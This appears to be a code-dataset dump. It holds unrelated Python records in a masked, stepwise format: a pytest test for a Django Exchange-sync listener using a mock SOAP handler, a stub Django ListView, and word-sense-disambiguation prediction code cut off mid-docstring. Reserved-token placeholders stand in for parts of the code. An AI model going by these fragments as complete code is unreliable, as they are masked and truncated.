self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = '%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(resource=space_resource,\n principal_email=email, exchange=exchange, sync_to_respa=True)\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n notification_listener = listener.NotificationListener()\n synced_resources = []\n\n def sync_resource(resource):\n synced_resources.append(resource)\n notification_listener.stop()\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n assert ex_resource in synced_resources\n",
"step-4": "import pytest\nfrom django.utils.crypto import get_random_string\nfrom django.utils.timezone import now\nfrom respa_exchange import listener\nfrom respa_exchange.ews.xml import M, NAMESPACES, T\nfrom respa_exchange.models import ExchangeResource\nfrom respa_exchange.tests.session import SoapSeller\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces\n =NAMESPACES):\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(M.ResponseMessages(M.\n SubscribeResponseMessage(M.ResponseCode('NoError'), M.\n SubscriptionId(subscription_id), ResponseClass='Success')))\n\n def _generate_event(self, type):\n return getattr(T, type)(T.TimeStamp(now().isoformat()), T.ItemId(Id\n =get_random_string(), ChangeKey=get_random_string()), T.\n ParentFolderId(Id=get_random_string(), ChangeKey=\n get_random_string()))\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES):\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0\n ].text\n return M.GetStreamingEventsResponse(M.ResponseMessages(M.\n GetStreamingEventsResponseMessage(M.ResponseCode('NoError'), M.\n Notifications(M.Notification(T.SubscriptionId(sub_id), self.\n _generate_event('NewMailEvent'))), ResponseClass='Success')))\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES):\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=\n NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(M.ResponseMessages(M.\n UnsubscribeResponseMessage(M.ResponseCode('NoError'),\n ResponseClass='Success')))\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = '%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(resource=space_resource,\n principal_email=email, exchange=exchange, sync_to_respa=True)\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n notification_listener = listener.NotificationListener()\n synced_resources = []\n\n def sync_resource(resource):\n synced_resources.append(resource)\n notification_listener.stop()\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n assert ex_resource in synced_resources\n",
"step-5": "import pytest\nfrom django.utils.crypto import get_random_string\nfrom django.utils.timezone import now\n\nfrom respa_exchange import listener\nfrom respa_exchange.ews.xml import M, NAMESPACES, T\nfrom respa_exchange.models import ExchangeResource\nfrom respa_exchange.tests.session import SoapSeller\n\n\nclass SubscriptionHandler(object):\n \"\"\"\n SoapSeller handler for the streaming requests.\n \"\"\"\n\n def __init__(self, resource):\n self.resource = resource\n self.subscription_to_resource = {}\n\n def handle_subscribe(self, request):\n if not request.xpath('//m:StreamingSubscriptionRequest', namespaces=NAMESPACES): # pragma: no cover\n return\n emails = request.xpath('//t:EmailAddress', namespaces=NAMESPACES)\n assert len(emails) == 1\n assert emails[0].text == self.resource.principal_email\n subscription_id = get_random_string(10)\n self.subscription_to_resource[subscription_id] = self.resource\n return M.SubscribeResponse(\n M.ResponseMessages(\n M.SubscribeResponseMessage(\n M.ResponseCode('NoError'),\n M.SubscriptionId(subscription_id),\n ResponseClass='Success',\n ),\n ),\n )\n\n def _generate_event(self, type):\n return getattr(T, type)(\n T.TimeStamp(now().isoformat()),\n T.ItemId(\n Id=get_random_string(),\n ChangeKey=get_random_string(),\n ),\n T.ParentFolderId(\n Id=get_random_string(),\n ChangeKey=get_random_string(),\n ),\n )\n\n def handle_get_events(self, request):\n if not request.xpath('//m:GetStreamingEvents', namespaces=NAMESPACES): # pragma: no cover\n return\n sub_id = request.xpath('//t:SubscriptionId', namespaces=NAMESPACES)[0].text\n # This would be a long-polling operation,\n # but ain't nobody got time for that\n return M.GetStreamingEventsResponse(\n M.ResponseMessages(\n M.GetStreamingEventsResponseMessage(\n M.ResponseCode('NoError'),\n M.Notifications(\n M.Notification(\n T.SubscriptionId(sub_id),\n self._generate_event('NewMailEvent'),\n ),\n ),\n ResponseClass='Success',\n ),\n ),\n )\n\n def handle_unsubscribe(self, request):\n if not request.xpath('//m:Unsubscribe', namespaces=NAMESPACES): # pragma: no cover\n return\n subscription_id = request.xpath('//m:SubscriptionId', namespaces=NAMESPACES)[0].text\n self.subscription_to_resource.pop(subscription_id)\n return M.UnsubscribeResponse(\n M.ResponseMessages(\n M.UnsubscribeResponseMessage(\n M.ResponseCode('NoError'),\n ResponseClass='Success',\n ),\n ),\n )\n\n\n@pytest.mark.django_db\ndef test_listener(settings, space_resource, exchange, monkeypatch):\n email = '%s@example.com' % get_random_string()\n ex_resource = ExchangeResource.objects.create(\n resource=space_resource,\n principal_email=email,\n exchange=exchange,\n sync_to_respa=True,\n )\n assert ex_resource.reservations.count() == 0\n delegate = SubscriptionHandler(ex_resource)\n SoapSeller.wire(settings, delegate)\n\n notification_listener = listener.NotificationListener()\n\n synced_resources = [] # Keep track of the resources we get sync-request events for\n\n def sync_resource(resource): # Our pretend sync handler\n synced_resources.append(resource)\n # Ask the listener to stop after we get a resource,\n # so this test actually ends someday:\n notification_listener.stop()\n\n monkeypatch.setattr(listener, 'sync_from_exchange', sync_resource)\n notification_listener.start()\n # ... so when `sync_resource` is called, this'll eventually happen:\n assert ex_resource in synced_resources\n",
"step-ids": [
4,
7,
8,
9,
10
]
}
|
[
4,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ExperimentList(ListView):
pass
<|reserved_special_token_1|>
from django.views.generic import ListView
class ExperimentList(ListView):
pass
|
flexible
|
{
"blob_id": "10990282c8aa0b9b26a69e451132ff37257acbc6",
"index": 3331,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass ExperimentList(ListView):\n pass\n",
"step-3": "from django.views.generic import ListView\n\n\nclass ExperimentList(ListView):\n pass\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
<|reserved_special_token_0|>
def __write_result(filename: str, frase, resources_path: str, outputh_path:
str, predictions, vocab=None, enable_coarse_grained: int=1,
vocab_for_coarse=None) ->int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
list_of_possible_senses_first_step, bn2wn)
candidates, list_of_possible_senses_bn_version = (
create_custom_label(list_of_possible_senses_bn_version,
parola.text, vocab, predictions[index],
enable_coarse_grained=enable_coarse_grained))
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
mfs_counter += 1
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + '/' + filename, 'a') as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if
wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
Dict=None) ->str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else 'factotum'
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) ->str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> LEXICOGRAPHER PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
bn2lex = get_bn2lex()
filename = filename[:-3] + 'lexicon.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
2][0], vocab=vocab_label_lex, enable_coarse_grained=3,
vocab_for_coarse=bn2lex)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def __predict(input_path: str, resources_path: str) ->Tuple:
"""
Actually predicts a sentence and returns the predictions in the requested formats
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: The actual prediction by the network
"""
train, etree_data = load_dataset(input_path)
train = [dato for dato in train if dato]
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
vocab_label_lex = create_mapping_dictionary(resources_path, mode='lex')
modello = WSD(resources_path + '/vocabularies/bert_vocab.txt', [len(
vocab_label_bn), len(vocab_label_wndmn), len(vocab_label_lex)],
dropout=0.1, recurrent_dropout=0.1, learning_rate=0.0003)
tokenizatore = modello.tokenizatore
modello.model.load_weights(resources_path + '/saved_model/model_20_2.14.h5'
)
to_return = []
sentences_xml_elements = etree_data.xpath('/*/*/*')
for sentence in train:
feature_1, feature_2, feature_3 = (
convert_sentence_to_features_no_padding(sentence, tokenizatore))
results = modello.model.predict({'input_word_ids': feature_1,
'input_mask': feature_2, 'segment_ids': feature_3}, verbose=1)
to_return.append(results)
del vocab_label_lex
del vocab_label_wndmn
del vocab_label_bn
return to_return, sentences_xml_elements
def __write_result(filename: str, frase, resources_path: str, outputh_path:
str, predictions, vocab=None, enable_coarse_grained: int=1,
vocab_for_coarse=None) ->int:
"""
Write results in the file system
:param filename: the name of the file to save
:param frase: the object from which recover the sentence
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:param output_path: the path of the output file (where you save your predictions)
:param predictions: the predictions made by the system
:param vocab: the vocab needed for giving a sense
:param enable_coarse_grained: changes the flow of the function from fine-grained to coarse-grained. Default to 1. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab_for_coarse: The vocab in support of mode 2 or 3
:return: 1 if succeeds
"""
global mfs_counter
bn2wn = get_bn2wn()
lemma2wn = reload_word_mapping(resources_path + '/mapping/lemma2wn.txt')
to_write = []
for index, parola in enumerate(frase):
name = parola.xpath('name()')
if name == 'instance':
id = parola.get('id')
list_of_possible_senses_first_step = lemma2wn.get(parola.text)
if not list_of_possible_senses_first_step:
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
mfs_counter += 1
to_write.append((id, the_actual_meaning))
continue
list_of_possible_senses_bn_version = convert_from_wnlist_2_bnlist(
list_of_possible_senses_first_step, bn2wn)
candidates, list_of_possible_senses_bn_version = (
create_custom_label(list_of_possible_senses_bn_version,
parola.text, vocab, predictions[index],
enable_coarse_grained=enable_coarse_grained))
the_actual_meaning = None
if candidates:
argmax = np.argmax(candidates)
the_actual_meaning = list_of_possible_senses_bn_version[argmax]
else:
mfs_counter += 1
the_actual_meaning = MFS(parola, bn2wn, vocab2=
vocab_for_coarse, pred_case=enable_coarse_grained)
to_write.append((id, the_actual_meaning))
with open(outputh_path + '/' + filename, 'a') as test_saving:
for tupla in to_write:
test_saving.write(tupla[0] + ' ' + tupla[1] + '\n')
del to_write
del lemma2wn
del bn2wn
return 1
def MFS(parola, vocab: Dict, vocab2: Dict=None, pred_case: int=1) ->str:
"""
Returns the sense by applying the Most Frequent Sense (MFS) strategy
:param parola: the Element object to which associate a sense
:param vocab: the vocab needed for giving a sense
:param vocab2: default to None. The other vocabulary to use if coarse-grained mode is enabled. Has to be populated if enable_coarse_grained
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:return: the chosen sense with the MFS technique
"""
pos = parola.get('pos')
pos_input = __decide_pos(pos)
wordnet_object = wordnet.synsets(parola.get('lemma'), pos=pos_input)
try:
wordnet_object = wordnet_object[0]
except:
print(wordnet_object)
print(parola.text)
wn_synset = 'wn:' + str(wordnet_object.offset()).zfill(8
) + wordnet_object.pos()
the_actual_meaning = next(key for key, value in vocab.items() if
wn_synset in value)
to_return = __extrapolate_value_for_MFS(the_actual_meaning, vocab=
vocab2, pred_case=pred_case)
return to_return
def __extrapolate_value_for_MFS(value: object, pred_case: int=1, vocab:
Dict=None) ->str:
"""
Taking either a List or String in input, that represents the found Babelnet ID, this function handles it and return a string that contains the value of the prediction
:param value: The Value from which to extrapolate the actual meaning found
:param pred_case: whether to adopt a "rollback" strategy such as MFS or not. Possible values:
1 --> Means I'm predicting with Babelnet. No extra precautions needed
2 --> Means I'm predicting with WordNet Domains. Need to consult the vocab. If I don't find anything, the empty class "factotum" is returned instead
3 --> Means I'm predicting with Lexicon. Need to consult the vocab.
:param vocab: The vocab in support of mode 2 or 3.
:return: the actual meaning found with MFS
"""
the_meaning_to_explot = __type_checker(value)
if pred_case == 1:
return the_meaning_to_explot
if pred_case == 2:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0] if to_return else 'factotum'
if pred_case == 3:
to_return = vocab.get(the_meaning_to_explot)
return to_return[0]
def __type_checker(value: object) ->str:
"""
Checks the type of the object and, accordingly, returns it
:param value: the value to examinate
:return: a string that is the value expected
"""
if type(value) == str:
return value
if type(value) == list:
return value[0]
<|reserved_special_token_0|>
def convert_from_wnlist_2_bnlist(list_of_bn: List, vocab: Dict) ->List:
"""
Cast the given list (which contains only WN ids) to Babelnet IDs
:param list_of_bn: the list to cast
:param vocab: the vocabulary to use to perform the conversion
:return: the converted list
"""
list_of_possible_senses_bn_version = []
for candidate in list_of_bn:
is_it_here = next(key for key, value in vocab.items() if candidate in
value)
if is_it_here:
list_of_possible_senses_bn_version.append(is_it_here if type(
is_it_here) == str else is_it_here[0])
return list_of_possible_senses_bn_version
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def predict_babelnet(input_path: str, output_path: str, resources_path: str
) ->None:
global mfs_counter
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <BABELSynset>" format (e.g. "d000.s000.t000 bn:01234567n").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
print('>>>> BABELNET PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_bn = create_mapping_dictionary(resources_path, mode='bn')
correctly_saved = 0
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'babelnet.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
0][0], vocab=vocab_label_bn, enable_coarse_grained=1,
vocab_for_coarse=None)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_wordnet_domains(input_path: str, output_path: str,
resources_path: str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <wordnetDomain>" format (e.g. "d000.s000.t000 sport").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
:param resources_path: the path of the resources folder containing your model and stuff you might need.
:return: None
"""
global mfs_counter
print('>>>> WORDNET DOMAINS PREDICTION')
prediction_results, sentences_xml_elements = __predict(input_path,
resources_path)
vocab_label_wndmn = create_mapping_dictionary(resources_path, mode='wndmn')
correctly_saved = 0
bn2wndom = get_bn2wndomains()
filename = os.path.normpath(input_path)
filename = filename.split(os.sep)[-1]
filename = filename[:-3] + 'wndomains.gold.key.txt'
for index in range(len(prediction_results)):
correctly_saved += __write_result(filename, sentences_xml_elements[
index], resources_path, output_path, prediction_results[index][
1][0], vocab=vocab_label_wndmn, enable_coarse_grained=2,
vocab_for_coarse=bn2wndom)
print('Successfully saved {} out of {}'.format(correctly_saved, len(
prediction_results)))
del prediction_results
print('Of these, {} were MFS'.format(mfs_counter))
mfs_counter = 0
return
def predict_lexicographer(input_path: str, output_path: str, resources_path:
str) ->None:
"""
DO NOT MODIFY THE SIGNATURE!
This is the skeleton of the prediction function.
The predict function will build your model, load the weights from the checkpoint and write a new file (output_path)
with your predictions in the "<id> <lexicographerId>" format (e.g. "d000.s000.t000 noun.animal").
The resources folder should contain everything you need to make the predictions. It is the "resources" folder in your submission.
N.B. DO NOT HARD CODE PATHS IN HERE. Use resource_path instead, otherwise we will not be able to run the code.
If you don't know what HARD CODING means see: https://en.wikipedia.org/wiki/Hard_coding
:param input_path: the path of the input file to predict in the same format as Raganato's framework (XML files you downloaded).
:param output_path: the path of the output file (where you save your predictions)
